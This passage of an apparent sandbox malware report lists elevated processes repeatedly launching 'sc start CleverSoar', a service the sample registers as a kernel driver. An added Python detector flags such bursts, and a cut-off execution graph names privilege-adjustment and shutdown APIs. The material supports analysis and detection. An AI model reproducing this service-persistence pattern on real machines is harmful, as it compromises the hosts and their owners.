                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:89
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:90
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:91
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:92
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:93
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:94
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:95
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:96
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:97
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:98
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:99
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:100
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:101
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:102
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:103
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:104
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:105
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:106
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:107
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:108
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true
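
The records above show the same two command lines, `cmd /c start sc start CleverSoar` and the `sc start CleverSoar` it spawns, being launched over and over within a few seconds from a process that already holds elevated privileges: a loop that keeps trying to start the service the sample installed. The Python below is an added example for triaging this pattern, not code from the Joe Sandbox report or from the sample. It parses records in the report's own `Key:value` layout and flags any service name whose start is attempted repeatedly inside a short window. The embedded input is a constructed excerpt of five records from this page (Target IDs 66, 67, 68, 72, 73); the burst threshold and the window are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: five of the report's own process records (Target IDs 66-68, 72 and 73), trimmed to the
# fields the detector reads and kept in the report's "Key:value" layout with one blank line between records.
SAMPLE_RECORDS = r"""
Target ID:66
Start time:21:42:42
Start date:24/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true

Target ID:67
Start time:21:42:42
Start date:24/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true

Target ID:68
Start time:21:42:42
Start date:24/12/2024
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Has elevated privileges:true

Target ID:72
Start time:21:42:43
Start date:24/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true

Target ID:73
Start time:21:42:43
Start date:24/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true
"""

# "sc start <name>" anywhere in the command line, so the "cmd /c start sc start X" wrapper matches as well
SC_START = re.compile(r"(?:^|\s)sc(?:\.exe)?\s+start\s+(\S+)", re.IGNORECASE)


def parse_process_records(text):
    """Split the report's process list into dicts. Each record is a run of 'Key:value' lines; the value keeps
    any later colons, which matters for 'Start time:21:42:42' and for 'Path:C:\\Windows\\...'."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if "Commandline" in rec:
            rec["started"] = datetime.strptime(f"{rec['Start date']} {rec['Start time']}", "%d/%m/%Y %H:%M:%S")
            records.append(rec)
    return records


def service_start_bursts(records, min_count=3, window=timedelta(seconds=10)):
    """Group every 'sc start <service>' launch by service name and report the names whose launches repeat at
    least min_count times inside the window. Thresholds are illustrative assumptions, not values from the report."""
    by_service = defaultdict(list)
    for rec in records:
        hit = SC_START.search(rec["Commandline"])
        if hit:
            by_service[hit.group(1)].append(rec)
    findings = []
    for service, launches in by_service.items():
        launches.sort(key=lambda r: r["started"])          # stable sort keeps Target ID order within a second
        span = launches[-1]["started"] - launches[0]["started"]
        if len(launches) >= min_count and span <= window:
            findings.append({
                "service": service,
                "count": len(launches),
                "span_seconds": int(span.total_seconds()),
                "all_elevated": all(r.get("Has elevated privileges") == "true" for r in launches),
                "via_cmd_start": sum(r["Path"].lower().endswith("cmd.exe") for r in launches),
                "direct_sc": sum(r["Path"].lower().endswith("sc.exe") for r in launches),
                "target_ids": [r["Target ID"] for r in launches],
            })
    return findings


if __name__ == "__main__":
    for f in service_start_bursts(parse_process_records(SAMPLE_RECORDS)):
        print(f"service {f['service']}: {f['count']} start attempts in {f['span_seconds']}s "
              f"(elevated={f['all_elevated']}, cmd-wrapped={f['via_cmd_start']}, direct sc.exe={f['direct_sc']}) "
              f"targets {f['target_ids']}")
```

The same detector applies to Sysmon event 1 or Security event 4688 data once the command line, image path and timestamp fields are mapped onto the same keys. On a suspect host the service's configuration lives under HKLM\SYSTEM\CurrentControlSet\Services\CleverSoar, where ImagePath names the binary and a Type value of 1 means it is registered as a kernel driver; that key is the place to look after a match.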


                            Execution Graph

                            Execution Coverage:2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:741
                            Total number of Limit Nodes:9
                            execution_graph: rendered as an interactive graph on the original page; the raw node/edge dump behind it is not reproduced here and is cut off part-way through in the source. What the dump records: nodes in the sample's two code ranges (6bf7xxxx-6bfbxxxx and 6c0exxxx-6c11xxxx) labelled with the APIs they call. The node at 6c0f9450 groups GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges and NtInitiatePowerAction and is reached from 6bf8244d, 6bf79624 and 6bf7f7b1; 6bf7fbe8 calls ExitWindowsEx and then Sleep; 6bf7e8dd calls GetCurrentProcess and TerminateProcess. Other APIs named on nodes: CreateFileA and CloseHandle (6bf75164), OpenSCManagerA (6c0f8810), CreateToolhelp32Snapshot (6c0f8930), CreateProcessA (6c0f86e0), Sleep, GetConsoleMode, ReadFile, ReadConsoleW, HeapFree, GetLastError, IsProcessorFeaturePresent, RaiseException, EnterCriticalSection and LeaveCriticalSection, alongside CRT internals (__dosmaperr, __wsopen_s, __cftoe, _Yarn, _strlen, std::_Facet_Register, std::ios_base::_Ios_base_dtor).
API calls 63798->63800 63799 6bf7c7bc 63801 6c0fa133 std::_Facet_Register 4 API calls 63799->63801 63809 6bf7c753 _Yarn _strlen 63800->63809 63801->63809 63802->63671 63802->63798 63802->63799 63802->63809 63803 6bf7d406 63806 6c0fa133 std::_Facet_Register 4 API calls 63803->63806 63804 6bf7d3ed 63805 6c0fa133 std::_Facet_Register 4 API calls 63804->63805 63807 6bf7d39a _Yarn 63805->63807 63806->63807 63808 6c0f9050 104 API calls 63807->63808 63810 6bf7d458 std::ios_base::_Ios_base_dtor _strlen 63808->63810 63809->63688 63809->63803 63809->63804 63809->63807 63815 6bf7cb2f 63809->63815 63810->63671 63811 6bf7d8a4 63810->63811 63812 6bf7d8bb 63810->63812 63816 6bf7d852 _Yarn _strlen 63810->63816 63813 6c0fa133 std::_Facet_Register 4 API calls 63811->63813 63814 6c0fa133 std::_Facet_Register 4 API calls 63812->63814 63813->63816 63814->63816 63816->63688 63817 6bf7dcb6 63816->63817 63818 6bf7dccf 63816->63818 63821 6bf7dc69 _Yarn 63816->63821 63819 6c0fa133 std::_Facet_Register 4 API calls 63817->63819 63820 6c0fa133 std::_Facet_Register 4 API calls 63818->63820 63819->63821 63820->63821 63822 6c0f9050 104 API calls 63821->63822 63824 6bf7dd1c std::ios_base::_Ios_base_dtor 63822->63824 63823 6c0f86e0 4 API calls 63823->63754 63824->63671 63824->63823 63826 6c0fa138 63825->63826 63827 6c0fa152 63826->63827 63830 6c0fa154 std::_Facet_Register 63826->63830 63934 6c102704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63826->63934 63827->63669 63829 6c0fafb3 std::_Facet_Register 63938 6c0fca69 RaiseException 63829->63938 63830->63829 63935 6c0fca69 RaiseException 63830->63935 63832 6c0fb7ac IsProcessorFeaturePresent 63838 6c0fb7d1 63832->63838 63834 6c0faf73 63936 6c0fca69 RaiseException 63834->63936 63836 6c0faf93 std::invalid_argument::invalid_argument 63937 6c0fca69 RaiseException 63836->63937 63838->63669 63840 6c0ee0a6 FindFirstFileA 63839->63840 63841 6c0ee0a4 63839->63841 63842 6c0ee0e0 63840->63842 63841->63840 63843 6c0ee13c 63842->63843 63844 
6c0ee0e2 FindClose 63842->63844 63843->63675 63844->63842 63846 6c0f8846 63845->63846 63847 6c0f88be OpenServiceA 63846->63847 63848 6c0f8922 63846->63848 63847->63846 63848->63720 63854 6c0e0893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63849->63854 63850 6c0e4e71 CloseHandle 63850->63854 63851 6bf837cb 63856 6c0f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63851->63856 63852 6c0e3bd1 CloseHandle 63852->63854 63854->63850 63854->63851 63854->63852 63855 6c0ccea0 WriteFile ReadFile WriteFile WriteFile 63854->63855 63939 6c0cc390 63854->63939 63855->63854 63856->63687 63858 6bf96bd5 63857->63858 63950 6bfc2020 63858->63950 63860 6bf96c68 63861 6c0fa133 std::_Facet_Register 4 API calls 63860->63861 63862 6bf96ca0 63861->63862 63967 6c0faa17 63862->63967 63864 6bf96cb4 63979 6bfc1d90 63864->63979 63867 6bf96d8e 63867->63731 63869 6bf96dc8 63987 6bfc26e0 24 API calls 4 library calls 63869->63987 63871 6bf96dda 63988 6c0fca69 RaiseException 63871->63988 63873 6bf96def 63989 6bfbe010 67 API calls 63873->63989 63875 6bf96e0f 63875->63731 63877 6bf96e9f 63876->63877 63880 6bf96eb3 63877->63880 64379 6bfc3560 32 API calls std::_Xinvalid_argument 63877->64379 63883 6bf96f5b 63880->63883 64381 6bfc2250 30 API calls 63880->64381 64382 6bfc26e0 24 API calls 4 library calls 63880->64382 64383 6c0fca69 RaiseException 63880->64383 63882 6bf96f6e 63882->63731 63883->63882 64380 6bfc37e0 32 API calls std::_Xinvalid_argument 63883->64380 63887 6bf9709e 63886->63887 63890 6bf970d1 63886->63890 64384 6bfc01f0 63887->64384 63888 6bf97183 63888->63720 63890->63888 64388 6bfc2250 30 API calls 63890->64388 63893 6c104208 67 API calls 63893->63890 63894 6bf971ae 64389 6bfc2340 24 API calls 63894->64389 63896 6bf971be 64390 6c0fca69 RaiseException 63896->64390 63898 6bf971c9 63899->63720 63900->63715 63902 6c0f8770 63901->63902 63903 6c0f87b0 WaitForSingleObject CloseHandle CloseHandle 63902->63903 63904 6c0f87a4 
63902->63904 63903->63902 63904->63724 63905->63735 63907 6c0f90a7 63906->63907 64436 6c0f96e0 63907->64436 63909 6c0f90b8 63910 6bf96ba0 104 API calls 63909->63910 63914 6c0f90dc 63910->63914 63912 6c0f918f std::ios_base::_Ios_base_dtor 64489 6bfbe010 67 API calls 63912->64489 63916 6c0f9144 63914->63916 63922 6c0f9157 63914->63922 64455 6c0f9a30 63914->64455 64463 6bfd3010 63914->64463 64473 6c0f9280 63916->64473 63919 6c0f91d2 std::ios_base::_Ios_base_dtor 63919->63774 63920 6c0f914c 63921 6bf97090 77 API calls 63920->63921 63921->63922 64488 6bfbe010 67 API calls 63922->64488 63923->63764 63928 6c0f8966 std::locale::_Setgloballocale 63924->63928 63925 6c0f8a64 Process32NextW 63925->63928 63926 6c0f8a14 CloseHandle 63926->63928 63927 6c0f8a96 63927->63692 63928->63925 63928->63926 63928->63927 63929 6c0f8a45 Process32FirstW 63928->63929 63929->63928 63930->63711 63931->63731 63933->63693 63934->63826 63935->63834 63936->63836 63937->63829 63938->63832 63940 6c0cc3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63939->63940 63941 6c0cce3c 63940->63941 63943 6c0ccab9 CreateFileA 63940->63943 63944 6c0cb4d0 63940->63944 63941->63854 63943->63940 63945 6c0cb4e3 __wsopen_s std::locale::_Setgloballocale 63944->63945 63946 6c0cc206 WriteFile 63945->63946 63947 6c0cc377 63945->63947 63948 6c0cb619 WriteFile 63945->63948 63949 6c0cbc23 ReadFile 63945->63949 63946->63945 63947->63940 63948->63945 63949->63945 63951 6c0fa133 std::_Facet_Register 4 API calls 63950->63951 63952 6bfc207e 63951->63952 63953 6c0faa17 43 API calls 63952->63953 63954 6bfc2092 63953->63954 63990 6bfc2f60 42 API calls 4 library calls 63954->63990 63956 6bfc210d 63961 6bfc2120 63956->63961 63991 6c0fa67e 9 API calls 2 library calls 63956->63991 63957 6bfc20c8 63957->63956 63958 6bfc2136 63957->63958 63992 6bfc2250 30 API calls 63958->63992 63961->63860 63962 6bfc215b 63993 6bfc2340 24 API calls 63962->63993 63964 6bfc2171 63994 6c0fca69 RaiseException 63964->63994 63966 6bfc217c 63966->63860 63968 
6c0faa23 __EH_prolog3 63967->63968 63995 6c0fa5a5 63968->63995 63973 6c0faa41 64009 6c0faaaa 39 API calls std::locale::_Setgloballocale 63973->64009 63974 6c0faa9c 63974->63864 63976 6c0faa49 64010 6c0fa8a1 HeapFree GetLastError _Yarn 63976->64010 63978 6c0faa5f 64001 6c0fa5d6 63978->64001 63980 6bfc1ddc 63979->63980 63981 6bf96d5d 63979->63981 64015 6c0fab37 63980->64015 63981->63867 63986 6bfc2250 30 API calls 63981->63986 63985 6bfc1e82 63986->63869 63987->63871 63988->63873 63989->63875 63990->63957 63991->63961 63992->63962 63993->63964 63994->63966 63996 6c0fa5bb 63995->63996 63997 6c0fa5b4 63995->63997 63999 6c0fa5b9 63996->63999 64012 6c0fbc7b EnterCriticalSection 63996->64012 64011 6c103abd 6 API calls std::_Lockit::_Lockit 63997->64011 63999->63978 64008 6c0fa920 6 API calls 2 library calls 63999->64008 64002 6c103acb 64001->64002 64003 6c0fa5e0 64001->64003 64014 6c103aa6 LeaveCriticalSection 64002->64014 64004 6c0fa5f3 64003->64004 64013 6c0fbc89 LeaveCriticalSection 64003->64013 64004->63974 64007 6c103ad2 64007->63974 64008->63973 64009->63976 64010->63978 64011->63999 64012->63999 64013->64004 64014->64007 64016 6c0fab40 64015->64016 64017 6bfc1dea 64016->64017 64024 6c10343a 64016->64024 64017->63981 64023 6c0ffc53 18 API calls __cftoe 64017->64023 64019 6c0fab8c 64019->64017 64035 6c103148 65 API calls 64019->64035 64021 6c0faba7 64021->64017 64036 6c104208 64021->64036 64023->63985 64026 6c103445 __wsopen_s 64024->64026 64025 6c103458 64061 6c103810 18 API calls __cftoe 64025->64061 64026->64025 64027 6c103478 64026->64027 64031 6c103468 64027->64031 64047 6c10e4fc 64027->64047 64031->64019 64035->64021 64037 6c104214 __wsopen_s 64036->64037 64038 6c104233 64037->64038 64039 6c10421e 64037->64039 64040 6c10422e 64038->64040 64242 6c0ffc99 EnterCriticalSection 64038->64242 64257 6c103810 18 API calls __cftoe 64039->64257 64040->64017 64042 6c104250 64243 6c10428c 64042->64243 64045 6c10425b 64258 6c104282 LeaveCriticalSection 64045->64258 64048 
6c10e508 __wsopen_s 64047->64048 64063 6c103a8f EnterCriticalSection 64048->64063 64050 6c10e516 64064 6c10e5a0 64050->64064 64055 6c10e662 64056 6c10e781 64055->64056 64088 6c10e804 64056->64088 64059 6c1034bc 64062 6c1034e5 LeaveCriticalSection 64059->64062 64061->64031 64062->64031 64063->64050 64073 6c10e5c3 64064->64073 64065 6c10e523 64078 6c10e55c 64065->64078 64066 6c10e61b 64083 6c10a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 64066->64083 64068 6c10e624 64084 6c107eab HeapFree GetLastError _free 64068->64084 64071 6c10e62d 64071->64065 64085 6c10a30f 6 API calls std::_Lockit::_Lockit 64071->64085 64073->64065 64073->64066 64081 6c0ffc99 EnterCriticalSection 64073->64081 64082 6c0ffcad LeaveCriticalSection 64073->64082 64074 6c10e64c 64086 6c0ffc99 EnterCriticalSection 64074->64086 64077 6c10e65f 64077->64065 64087 6c103aa6 LeaveCriticalSection 64078->64087 64080 6c103493 64080->64031 64080->64055 64081->64073 64082->64073 64083->64068 64084->64071 64085->64074 64086->64077 64087->64080 64090 6c10e823 64088->64090 64089 6c10e84b 64099 6c10e96b 64089->64099 64105 6c117598 37 API calls __cftoe 64089->64105 64090->64089 64091 6c10e836 64090->64091 64104 6c103810 18 API calls __cftoe 64091->64104 64093 6c10e797 64093->64059 64101 6c1176ce 64093->64101 64096 6c10e9bb 64096->64099 64106 6c117598 37 API calls __cftoe 64096->64106 64098 6c10e9d9 64098->64099 64107 6c117598 37 API calls __cftoe 64098->64107 64099->64093 64108 6c103810 18 API calls __cftoe 64099->64108 64109 6c117a86 64101->64109 64104->64093 64105->64096 64106->64098 64107->64099 64108->64093 64111 6c117a92 __wsopen_s 64109->64111 64110 6c117a99 64127 6c103810 18 API calls __cftoe 64110->64127 64111->64110 64112 6c117ac4 64111->64112 64118 6c1176ee 64112->64118 64117 6c1176e9 64117->64059 64129 6c103dbb 64118->64129 64123 6c117724 64125 6c117756 64123->64125 64169 6c107eab HeapFree GetLastError _free 64123->64169 64128 6c117b1b LeaveCriticalSection 
__wsopen_s 64125->64128 64127->64117 64128->64117 64170 6c0ff3db 64129->64170 64133 6c103ddf 64134 6c0ff4e6 64133->64134 64179 6c0ff53e 64134->64179 64136 6c0ff4fe 64136->64123 64137 6c11775c 64136->64137 64194 6c117bdc 64137->64194 64143 6c11778e __dosmaperr 64143->64123 64144 6c117882 GetFileType 64146 6c1178d4 64144->64146 64147 6c11788d GetLastError 64144->64147 64145 6c117857 GetLastError 64145->64143 64224 6c114ea0 SetStdHandle __dosmaperr __wsopen_s 64146->64224 64223 6c1030e2 __dosmaperr _free 64147->64223 64148 6c117805 64148->64144 64148->64145 64222 6c117b47 CreateFileW 64148->64222 64150 6c11789b CloseHandle 64150->64143 64152 6c1178c4 64150->64152 64152->64143 64154 6c11784a 64154->64144 64154->64145 64155 6c1178f5 64156 6c117941 64155->64156 64225 6c117d56 70 API calls 2 library calls 64155->64225 64160 6c117948 64156->64160 64239 6c117e00 70 API calls 2 library calls 64156->64239 64159 6c117976 64159->64160 64161 6c117984 64159->64161 64226 6c10f015 64160->64226 64161->64143 64163 6c117a00 CloseHandle 64161->64163 64240 6c117b47 CreateFileW 64163->64240 64165 6c117a2b 64165->64152 64166 6c117a35 GetLastError 64165->64166 64167 6c117a41 __dosmaperr 64166->64167 64241 6c114e0f SetStdHandle __dosmaperr __wsopen_s 64167->64241 64169->64125 64171 6c0ff3fb 64170->64171 64177 6c0ff3f2 64170->64177 64172 6c1080a2 __Getctype 37 API calls 64171->64172 64171->64177 64173 6c0ff41b 64172->64173 64174 6c108618 __Getctype 37 API calls 64173->64174 64175 6c0ff431 64174->64175 64176 6c108645 __cftoe 37 API calls 64175->64176 64176->64177 64177->64133 64178 6c10a0c5 5 API calls std::_Lockit::_Lockit 64177->64178 64178->64133 64180 6c0ff54c 64179->64180 64181 6c0ff566 64179->64181 64182 6c0ff4cc __wsopen_s HeapFree GetLastError 64180->64182 64183 6c0ff58c 64181->64183 64185 6c0ff56d 64181->64185 64189 6c0ff556 __dosmaperr 64182->64189 64184 6c107f33 __fassign MultiByteToWideChar 64183->64184 64186 6c0ff59b 64184->64186 64187 6c0ff48d __wsopen_s HeapFree GetLastError 
64185->64187 64185->64189 64188 6c0ff5a2 GetLastError 64186->64188 64190 6c0ff5c8 64186->64190 64191 6c0ff48d __wsopen_s HeapFree GetLastError 64186->64191 64187->64189 64188->64189 64189->64136 64190->64189 64192 6c107f33 __fassign MultiByteToWideChar 64190->64192 64191->64190 64193 6c0ff5df 64192->64193 64193->64188 64193->64189 64195 6c117c17 64194->64195 64197 6c117bfd 64194->64197 64196 6c117b6c __wsopen_s 18 API calls 64195->64196 64201 6c117c4f 64196->64201 64197->64195 64198 6c103810 __cftoe 18 API calls 64197->64198 64198->64195 64199 6c117c7e 64200 6c119001 __wsopen_s 18 API calls 64199->64200 64205 6c117779 64199->64205 64202 6c117ccc 64200->64202 64201->64199 64204 6c103810 __cftoe 18 API calls 64201->64204 64203 6c117d49 64202->64203 64202->64205 64206 6c10383d __Getctype 11 API calls 64203->64206 64204->64199 64205->64143 64208 6c114cfc 64205->64208 64207 6c117d55 64206->64207 64209 6c114d08 __wsopen_s 64208->64209 64210 6c103a8f std::_Lockit::_Lockit EnterCriticalSection 64209->64210 64213 6c114d0f 64210->64213 64211 6c114d56 64214 6c114e06 __wsopen_s LeaveCriticalSection 64211->64214 64212 6c114d34 64215 6c114f32 __wsopen_s 11 API calls 64212->64215 64213->64211 64213->64212 64218 6c114da3 EnterCriticalSection 64213->64218 64216 6c114d76 64214->64216 64217 6c114d39 64215->64217 64216->64143 64221 6c117b47 CreateFileW 64216->64221 64217->64211 64220 6c115080 __wsopen_s EnterCriticalSection 64217->64220 64218->64211 64219 6c114db0 LeaveCriticalSection 64218->64219 64219->64213 64220->64211 64221->64148 64222->64154 64223->64150 64224->64155 64225->64156 64227 6c114c92 __wsopen_s 18 API calls 64226->64227 64229 6c10f025 64227->64229 64228 6c10f02b 64230 6c114e0f __wsopen_s SetStdHandle 64228->64230 64229->64228 64231 6c10f05d 64229->64231 64233 6c114c92 __wsopen_s 18 API calls 64229->64233 64238 6c10f083 __dosmaperr 64230->64238 64231->64228 64232 6c114c92 __wsopen_s 18 API calls 64231->64232 64234 6c10f069 CloseHandle 64232->64234 64235 6c10f054 
